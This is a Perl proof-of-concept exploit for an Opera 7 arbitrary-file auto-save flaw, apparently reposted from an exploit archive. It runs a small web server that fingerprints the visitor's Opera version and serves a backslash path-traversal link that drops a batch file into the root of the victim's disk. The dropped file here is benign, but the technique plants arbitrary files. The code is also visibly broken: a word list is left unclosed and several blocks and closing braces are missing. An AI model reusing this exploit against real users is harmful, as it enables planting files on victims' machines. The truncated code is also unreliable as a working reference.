# Sample code of
# "[Opera 7] Arbitrary File Auto-Saved Vulnerability."
# This Exploit will run a webserver that will create and execute a batch
# file on the victim's computer when visiting this malicious server
# This perl script is a small HTTP server for a check ofthe vulnerability.
# BTW, you can exploit this vulnerability without a server like this
# if your apache or etc., allow a request URL that contains '..'.
# Tested on :
# Opera 7.22
# Opera 7.21
# Opera 7.20
# Opera 7.1X
# Opera 7.0X
# with Active Perl 5.8.0 on Windows 2000 Pro SP4 JP.
# (maybe need Perl 5.6 or later)
# Usage :
# [0] Execute "perl this_script 10080" on a console,
# this server starts to listen in port 10080.
# [1] Opera opens "".
# [2] Click link.
# [3] Auto-saved an arbitrary file on a root directory
# of Local Disk ...
# 2003/11/15
# written by nesumin <nesumin softhome net>
# public on www.k-otik.com
use HTTP::Daemon;
use HTTP::Status;
use constant URL => '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C_opera_.bat';
use constant FILE_CONTENT => qq~\@echo off\x0D\x0Aecho "Love & Peace :-)"\x0D\x0A\@pause~;
use constant RES_HEADERS => qw(Pragma no-cache Connection close);
use constant REUSE => 1;
use constant VIEW_DATA => 0;
my @MIMETYPES = qw(
my $port = ($ARGV[0] || 10080) + 0;
die("port is not correct") unless (0 < $port && $port < 65536);
my $daemon = new HTTP::Daemon(LocalPort=>$port, Reuse=>REUSE)
or die("HTTP::Daemon->new() error : $!.\n");
printf("[*] server started on %d.\n", $daemon->sockport());
while (my $ccon = $daemon->accept()) {
printf("[*] incoming client : from %s:%d(%08X).\n",
inet_ntoa($ccon->peeraddr()), $ccon->peerport(), $ccon);
if (my $req = $ccon->get_request()) {
print("\n[*] request received...\n", map{" >> $_\n"}
($req->as_string() =~ /^([^\r\n]+)/mg)) if (VIEW_DATA);
if ($req->method eq 'GET') {
my $url = URL;
my $res = new HTTP::Response(200, 'OK', new HTTP::Headers(RES_HEADERS));
if ($req->url->path eq '/') {
$res->content(qq~<a href="$url">Click here</a>~);
} else {
my $mimetype = $MIMETYPES[rand(@MIMETYPES)];
if ($req->header('User-Agent')=~m~Opera[\s+/]((\d\.\d)\d)~i){
# Opera 7.0x
if ($2 eq "7.0") {
$url .= '*.zip';# '*' is a special char :-)
$mimetype = $MIMETYPES[$#MIMETYPES];
# Opera 7.22
} elsif ($1 eq "7.22") {
$mimetype = $MIMETYPES[rand(@MIMETYPES-2)];
print("\n[*] response sent...\n", map{" >> $_\n"}
($res->as_string() =~ /^([^\r\n]+)/mg)) if (VIEW_DATA);
} else {
printf("[*] client closed : from %s:%d (%08X).\n",
inet_ntoa($ccon->peeraddr()), $ccon->peerport(), $ccon);
print("[*] server closed.\n");
# sebug.net